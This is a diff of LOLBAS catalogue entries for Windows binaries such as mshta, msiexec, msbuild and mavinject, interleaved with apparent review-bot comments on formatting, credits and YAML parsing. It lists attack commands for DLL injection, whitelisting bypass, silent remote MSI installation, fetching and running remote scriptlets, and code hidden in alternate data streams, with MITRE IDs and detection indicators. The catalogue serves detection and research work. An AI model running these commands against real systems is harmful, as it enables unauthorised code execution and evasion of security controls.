|   - Path: C:\Windows\SysWOW64\makecab.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC: Makecab getting files from Internet | ||||
|  - IOC: Makecab storing data into alternate data streams | ||||
| Resources: | ||||
|   - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f | ||||
| Notes: Thanks to Oddvar Moe - @oddvarmoe | ||||
|  | ||||
|   - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f | ||||
| Acknowledgement: | ||||
|   - Person: Oddvar Moe | ||||
|     Handle: '@oddvarmoe' | ||||
| --- | ||||
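Review bot: the new Download entry's `Description: Download and compresses the target file and stores it in the target file.` mixes verb forms and calls both files "the target"; `Downloads and compresses the source file and stores it in the target .cab file` reads correctly and separates source from destination. The second ADS entry `makecab \\webdavserver\webdav\file.exe C:\Folder\file.txt:file.cab` replaces the old local example `makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab`, so every remaining command now pulls from a WebDAV server; keeping one local-source example would keep the `Makecab storing data into alternate data streams` IOC distinct from the `Makecab getting files from Internet` one.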
| @@ -1,22 +1,39 @@ | ||||
| --- | ||||
| Name: Mavinject.exe | ||||
| Description: Execute, Read ADS | ||||
| Author: '' | ||||
| Description: Used by App-v in Windows | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: MavInject.exe 3110 /INJECTRUNNING c:\folder\evil.dll | ||||
|     Description: Inject evil.dll into a process with PID 3110. | ||||
|     Usecase: Inject dll file into running process | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: Mavinject.exe 4172 /INJECTRUNNING "c:\ads\file.txt:file.dll" | ||||
|     Description: Inject file.dll stored as an Alternate Data Stream (ADS) into a process with PID 4172. | ||||
|     Description: Inject file.dll stored as an Alternate Data Stream (ADS) into a process with PID 4172 | ||||
|     Usecase: Inject dll file into running process | ||||
|     Category: Alternate data streams | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - C:\Windows\System32\mavinject.exe | ||||
|   - C:\Windows\SysWOW64\mavinject.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Windows\System32\mavinject.exe | ||||
|   - Path: C:\Windows\SysWOW64\mavinject.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC: mavinject.exe should not run unless APP-v is in use on the workstation | ||||
| Resources: | ||||
|   - https://twitter.com/gN3mes1s/status/941315826107510784 | ||||
|   - https://twitter.com/Hexcorn/status/776122138063409152 | ||||
|   - https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ | ||||
| Notes: Thanks to Giuseppe N3mes1s - @gN3mes1s, Adam - @hexacorn, Oddvar Moe - @oddvarmoe | ||||
|  | ||||
|   - Link: https://twitter.com/gN3mes1s/status/941315826107510784 | ||||
|   - Link: https://twitter.com/Hexcorn/status/776122138063409152 | ||||
|   - Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ | ||||
| Acknowledgement: | ||||
|   - Person: Giuseppe N3mes1s | ||||
|     Handle: '@gN3mes1s' | ||||
|   - Person: Oddvar Moe | ||||
|     Handle: '@oddvarmoe' | ||||
| --- | ||||
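Review bot: the `Acknowledgement:` block drops Adam (@hexacorn), who was credited in the old `Notes: Thanks to Giuseppe N3mes1s - @gN3mes1s, Adam - @hexacorn, Oddvar Moe - @oddvarmoe` line, while his tweet `https://twitter.com/Hexcorn/status/776122138063409152` is kept under Resources; add a `- Person: Adam` / `Handle: '@hexacorn'` entry, and note that the URL says `Hexcorn` while the old handle was `hexacorn`, so one of the two needs checking. The rewritten `Description: Inject file.dll stored as an Alternate Data Stream (ADS) into a process with PID 4172` also lost the trailing period the first entry keeps.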
| @@ -1,27 +1,44 @@ | ||||
| --- | ||||
| Name: Msbuild.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Name: Msbuild.exe  | ||||
| Description: Used to compile and execute code | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: msbuild.exe pshell.xml | ||||
|     Description: Build and execute a C# project stored in the target XML file. | ||||
|   - Command: msbuild.exe Msbuild.csproj | ||||
|     Description: Build and execute a C# project stored in the target CSPROJ file. | ||||
|     Usecase: Compile and run code | ||||
|     Category: AWL bypass | ||||
|     Privileges: User | ||||
|     MitreID: T1127 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1127 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: msbuild.exe project.csproj | ||||
|     Description: Build and execute a C# project stored in the target csproj file. | ||||
|     Usecase: Compile and run code | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1127 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1127 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe | ||||
|   - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Msbuild.exe | ||||
|   - C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe | ||||
|   - C:\Windows\Microsoft.NET\Framework64\v3.5\Msbuild.exe | ||||
|   - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe | ||||
|   - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Msbuild.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Msbuild.exe | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework64\v3.5\Msbuild.exe | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Msbuild.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC: Msbuild.exe should not normally be executed on workstations | ||||
| Resources: | ||||
|   - https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Trusted_Developer_Utilities.md | ||||
|   - https://github.com/Cn33liz/MSBuildShell | ||||
|   - https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/ | ||||
|   - https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ | ||||
| Notes: Thanks to Casey Smith - @subtee, Cn33liz - @Cneelis | ||||
|  | ||||
|   - Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md | ||||
|   - Link: https://github.com/Cn33liz/MSBuildShell | ||||
|   - Link: https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/ | ||||
|   - Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ | ||||
| Acknowledgement: | ||||
|   - Person: Casey Smith | ||||
|     Handle: '@subtee' | ||||
|   - Person: Cn33liz | ||||
|     Handle: '@Cneelis' | ||||
| --- | ||||
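Review bot: `Name: Msbuild.exe ` now has trailing whitespace that the old `Name: Msbuild.exe` did not; if Name is used to generate file or page names, that yields a name ending in a space. The two entries use different sample project names (`msbuild.exe Msbuild.csproj` vs `msbuild.exe project.csproj`) and different casing in the description (`CSPROJ` vs `csproj`) for the same technique filed under two categories; the other dual-category files in this commit (Installutil, Msdt) keep both lines identical, so these should match too.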
| @@ -1,19 +1,27 @@ | ||||
| --- | ||||
| Name: Msconfig.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Description: MSConfig is a troubleshooting tool which is used to temporarily disable or re-enable software, device drivers or Windows services that run during startup process to help the user determine the cause of a problem with Windows | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: Msconfig.exe -5 | ||||
|     Description: Executes command embeded in crafted c:\windows\system32\mscfgtlc.xml. | ||||
|     Usecase: Code execution using Msconfig.exe | ||||
|     Category: Execute | ||||
|     Privileges: Administrator | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - c:\windows\system32\msconfig.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Windows\System32\msconfig.exe | ||||
| Code Sample:  | ||||
| - Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/mscfgtlc.xml | ||||
| Detection: | ||||
|  - IOC: mscfgtlc.xml changes in system32 folder | ||||
|  - IOC: msconfig.exe executing | ||||
| Resources: | ||||
|   - https://twitter.com/pabraeken/status/991314564896690177 | ||||
| Notes: | | ||||
|     Thanks to Pierre-Alexandre Braeken - @pabraeken | ||||
|     See the Payloads folder for an example mscfgtlc.xml file. | ||||
|  | ||||
|   - Link: https://twitter.com/pabraeken/status/991314564896690177 | ||||
| Acknowledgement: | ||||
|   - Person: Pierre-Alexandre Braeken | ||||
|     Handle: '@pabraeken' | ||||
| --- | ||||
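Review bot: the IOC `msconfig.exe executing` is too broad to be actionable, since msconfig is a standard administrative troubleshooting tool (as the new Description itself says); the entry's own command `Msconfig.exe -5` and the companion indicator `mscfgtlc.xml changes in system32 folder` are the specific signals, so the second IOC should at least mention the `-5` argument. The context line `Description: Executes command embeded in crafted c:\windows\system32\mscfgtlc.xml.` carries a typo (`embedded`) that this rewrite could have fixed. Moving the payload pointer from the old `See the Payloads folder for an example mscfgtlc.xml file.` note into `Code Sample:` as a raw.githubusercontent.com link is a good change.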
| @@ -1,25 +1,37 @@ | ||||
| --- | ||||
| Name: Msdt.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Description: Microsoft diagnostics tool  | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: Open .diagcab package | ||||
|     Description: '' | ||||
|   - Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml | ||||
|       /skip TRUE | ||||
|   - Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE | ||||
|     Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file. | ||||
|     Usecase: Execute code | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE | ||||
|     Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file. | ||||
|     Usecase: Execute code bypass Application whitelisting | ||||
|     Category: AWL bypass | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - 'C:\Windows\System32\Msdt.exe    ' | ||||
|   - 'C:\Windows\SysWOW64\Msdt.exe    ' | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Windows\System32\Msdt.exe | ||||
|   - Path: C:\Windows\SysWOW64\Msdt.exe | ||||
| Code Sample:  | ||||
| - Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/PCW8E57.xml | ||||
| Detection: | ||||
|  - IOC:  | ||||
| Resources: | ||||
|   - https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/ | ||||
|   - https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/ | ||||
|   - https://twitter.com/harr0ey/status/991338229952598016 | ||||
| Notes: | | ||||
|     Thanks to: | ||||
|     See the Payloads folder for an example PCW8E57.xml file. | ||||
|  | ||||
|   - Link: https://web.archive.org/web/20160322142537/https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/ | ||||
|   - Link: https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/ | ||||
|   - Link: https://twitter.com/harr0ey/status/991338229952598016 | ||||
| Acknowledgement: | ||||
|   - Person:  | ||||
|     Handle: | ||||
| --- | ||||
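Review bot: the Acknowledgement block added at the end of this hunk has both `- Person:` and `Handle:` empty, which leaves a null entry in the parsed list; either fill in the credited person or drop the empty item. The removed Notes line that pointed readers to the Payloads folder for the example PCW8E57.xml has no replacement in prose, so that pointer now survives only as the raw.githubusercontent.com URL on the `- Code:` line; consider keeping a one-line mention so the reference is discoverable without following the link.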
| @@ -1,28 +1,57 @@ | ||||
| --- | ||||
| Name: mshta.exe | ||||
| Description: Execute, Read ADS | ||||
| Author: '' | ||||
| Name: Mshta.exe | ||||
| Description: Used by Windows to execute html applications. (.hta) | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: mshta.exe evilfile.hta | ||||
|     Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript. | ||||
|     Usecase: Execute code | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1170 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1170 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: mshta.exe vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")")) | ||||
|     Description: Executes VBScript supplied as a command line argument. | ||||
|   - Command: mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct").Exec();close(); | ||||
|     Usecase: Execute code | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1170 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1170 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct").Exec();close(); | ||||
|     Description: Executes JavaScript supplied as a command line argument. | ||||
|     Usecase: Execute code | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1170 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1170 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: mshta.exe "C:\ads\file.txt:file.hta" | ||||
|     Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript. | ||||
|     Usecase: Execute code hidden in alternate data stream | ||||
|     Category: Alternate data streams | ||||
|     Privileges: User | ||||
|     MitreID: T1170 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1170 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - C:\Windows\System32\mshta.exe | ||||
|   - C:\Windows\SysWOW64\mshta.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Windows\System32\mshta.exe | ||||
|   - Path: C:\Windows\SysWOW64\mshta.exe | ||||
| Code Sample:  | ||||
| - Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct | ||||
| Detection: | ||||
|  - IOC: mshta.exe executing raw or obfuscated script within the command-line | ||||
|  - IOC: Usage of HTA file | ||||
| Resources: | ||||
|   - https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Mshta.md | ||||
|   - https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_4 | ||||
|   - https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/mshta.sct | ||||
|   - https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/ | ||||
|   - https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ | ||||
| Notes: Thanks to Casey Smith - @subtee, Oddvar Moe - @oddvarmoe | ||||
|  | ||||
|   - Link: https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_4 | ||||
|   - Link: https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/mshta.sct | ||||
|   - Link: https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/ | ||||
|   - Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/   | ||||
| Acknowledgement: | ||||
|   - Person: Casey Smith | ||||
|     Handle: '@subtee' | ||||
|   - Person: Oddvar Moe | ||||
|     Handle: '@oddvarmoe' | ||||
| --- | ||||
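Review bot: the removed link to atomic-red-team's Windows/Execution/Mshta.md has no counterpart in the new Resources block (only the Payloads/mshta.sct link is carried over), while the regasm and regsvr32 files in this commit do swap their Execution/*.md resources for the new atomics pages; add the equivalent page or keep the old link. The new vbscript command also uses a defanged URL (`https[:]//webserver/payload[.]sct`) while the javascript entry directly below it uses a live raw.githubusercontent.com URL; pick one convention for the file. The last `- Link:` line carries trailing whitespace.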
| @@ -1,25 +1,54 @@ | ||||
| --- | ||||
| Name: Msiexec.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Description: Used by Windows to execute msi files | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: msiexec /quiet /i cmd.msi | ||||
|     Description: Installs the target .MSI file silently. | ||||
|     Usecase: Execute custom made msi file with attack code | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: msiexec /q /i http://192.168.100.3/tmp/cmd.png | ||||
|     Description: Installs the target remote & renamed .MSI file silently. | ||||
|     Usecase: Execute custom made msi file with attack code from remote server | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: msiexec /y "C:\folder\evil.dll" | ||||
|     Description: Calls DLLRegisterServer to register the target DLL. | ||||
|     Usecase: Execute dll files | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: msiexec /z "C:\folder\evil.dll" | ||||
|     Description: Calls DLLRegisterServer to un-register the target DLL. | ||||
|     Usecase: Execute dll files | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10     | ||||
| Full Path: | ||||
|   - c:\windows\system32\msiexec.exe | ||||
|   - c:\windows\sysWOW64\msiexec.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Windows\System32\msiexec.exe | ||||
|   - Path: C:\Windows\SysWOW64\msiexec.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC: msiexec.exe getting files from Internet | ||||
| Resources: | ||||
|   - https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/ | ||||
|   - https://twitter.com/PhilipTsukerman/status/992021361106268161 | ||||
| Notes: Thanks to ? - @netbiosX, PhilipTsukerman - @PhilipTsukerman | ||||
|  | ||||
|   - Link: https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/ | ||||
|   - Link: https://twitter.com/PhilipTsukerman/status/992021361106268161 | ||||
| Acknowledgement: | ||||
|   - Person: netbiosX | ||||
|     Handle: '@netbiosX' | ||||
|   - Person: Philip Tsukerman | ||||
|     Handle: @PhilipTsukerman | ||||
| --- | ||||
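Review bot: `Handle: @PhilipTsukerman` in the Acknowledgement block is an unquoted plain scalar starting with `@`, which YAML reserves as an indicator, so strict parsers such as PyYAML reject the file with a "cannot start any token" error; quote it as `'@PhilipTsukerman'`, matching the `'@netbiosX'` entry just above it and the other files in this commit. The OperatingSystem line of the `/z` command also carries trailing whitespace.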
| @@ -1,22 +1,28 @@ | ||||
| --- | ||||
| Name: odbcconf.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Name: Odbcconf.exe | ||||
| Description: Used in Windows for managing ODBC connections | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: odbcconf -f file.rsp | ||||
|     Description: Load DLL specified in target .RSP file. | ||||
|     Description: Load DLL specified in target .RSP file. See the Playloads folder for an example .RSP file. | ||||
|     Usecase: Execute dll file using technique that can evade defensive counter measures | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - 'c:\windows\system32\odbcconf.exe    ' | ||||
|   - c:\windows\sysWOW64\odbcconf.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Windows\System32\odbcconf.exe | ||||
|   - Path: C:\Windows\SysWOW64\odbcconf.exe | ||||
| Code Sample:  | ||||
| - Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/file.rsp | ||||
| Detection: | ||||
|  - IOC: | ||||
| Resources: | ||||
|   - https://gist.github.com/NickTyrer/6ef02ce3fd623483137b45f65017352b | ||||
|   - https://github.com/woanware/application-restriction-bypasses | ||||
|   - https://twitter.com/subTee/status/789459826367606784 | ||||
| Notes: | | ||||
|     Thanks to Casey Smith - @subtee, Nick Tyrer - @NickTyrer | ||||
|     See the Playloads folder for an example .RSP file. | ||||
|  | ||||
|   - Link: https://gist.github.com/NickTyrer/6ef02ce3fd623483137b45f65017352b | ||||
|   - Link: https://github.com/woanware/application-restriction-bypasses | ||||
| Acknowledgement: | ||||
|   - Person: Casey Smith | ||||
|     Handle: '@subtee' | ||||
| --- | ||||
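Review bot: the extended Description for `odbcconf -f file.rsp` carries the "Playloads" typo over from the removed Notes block; since the new `- Code:` line links the .RSP file directly, either correct it to "Payloads" or drop the sentence. The Acknowledgement block also loses Nick Tyrer (@NickTyrer), whom the removed Notes line credited alongside Casey Smith and whose gist is still the first Link; add him back as a second Person/Handle entry. The `twitter.com/subTee/status/789459826367606784` resource is dropped without replacement as well.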
| @@ -1,24 +1,44 @@ | ||||
| --- | ||||
| Name: Pcalua.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Description: Program Compatibility Assistant | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: pcalua.exe -a calc.exe | ||||
|     Description: Open the target .EXE using the Program Compatibility Assistant. | ||||
|     Usecase: Proxy execution of binary | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: pcalua.exe -a \\server\payload.dll | ||||
|     Description: Open the target .DLL file with the Program Compatibilty Assistant. | ||||
|     Usecase: Proxy execution of remote dll file | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: pcalua.exe -a C:\Windows\system32\javacpl.cpl -c Java | ||||
|     Description: Open the target .CPL file with the Program Compatibility Assistant. | ||||
|     Usecase: Execution of CPL files | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - c:\windows\system32\pcalua.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Windows\System32\pcalua.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC: | ||||
| Resources: | ||||
|   - https://twitter.com/KyleHanslovan/status/912659279806640128 | ||||
| Notes: | | ||||
|     Thanks to: | ||||
|     fab - @0rbz_ | ||||
|     Kyle Hanslovan - @KyleHanslovan | ||||
|  | ||||
|   - Link: https://twitter.com/KyleHanslovan/status/912659279806640128 | ||||
| Acknowledgement: | ||||
|   - Person: Kyle Hanslovan | ||||
|     Handle: '@kylehanslovan' | ||||
|   - Person: Fab | ||||
|     Handle: @0rbz_ | ||||
| --- | ||||
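Review bot: `Handle: @0rbz_` is an unquoted plain scalar starting with `@`, a reserved YAML indicator that strict parsers reject; quote it like the `'@kylehanslovan'` entry above it. That entry in turn lowercases the handle relative to the removed `@KyleHanslovan`, and the second command's Description spells "Compatibilty" where the first and third entries have "Compatibility".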
| @@ -1,17 +1,26 @@ | ||||
| --- | ||||
| Name: Pcwrun.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Description: Program Compatibility Wizard | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: Pcwrun.exe c:\temp\beacon.exe | ||||
|     Description: Open the target .EXE file with the Program Compatibility Wizard. | ||||
|     Usecase: Proxy execution of binary | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - c:\windows\system32\pcwrun.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Windows\System32\pcwrun.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC: | ||||
| Resources: | ||||
|   - https://twitter.com/pabraeken/status/991335019833708544 | ||||
| Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken | ||||
|  | ||||
|   - Link: https://twitter.com/pabraeken/status/991335019833708544 | ||||
| Acknowledgement: | ||||
|   - Person: Pierre-Alexandre Braeken | ||||
|     Handle: '@pabraeken' | ||||
| --- | ||||
| @@ -1,19 +1,28 @@ | ||||
| --- | ||||
| Name: PresentationHost.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Name: Presentationhost.exe | ||||
| Description: File is used for executing Browser applications | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: Presentationhost.exe C:\temp\Evil.xbap | ||||
|     Description: Executes the target XAML Browser Application (XBAP) file. | ||||
|     Description: Executes the target XAML Browser Application (XBAP) file | ||||
|     Usecase: Execute code within xbap files | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - 'c:\windows\system32\PresentationHost.exe     ' | ||||
|   - 'c:\windows\sysWOW64\PresentationHost.exe    ' | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Windows\System32\Presentationhost.exe | ||||
|   - Path: C:\Windows\SysWOW64\Presentationhost.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC: | ||||
| Resources: | ||||
|   - https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf | ||||
|   - https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/ | ||||
| Notes: Thanks to Casey Smith - @subtee | ||||
|  | ||||
|   - Link: https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf | ||||
|   - Link: https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/ | ||||
| Acknowledgement: | ||||
|   - Person: Casey Smith | ||||
|     Handle: '@subtee' | ||||
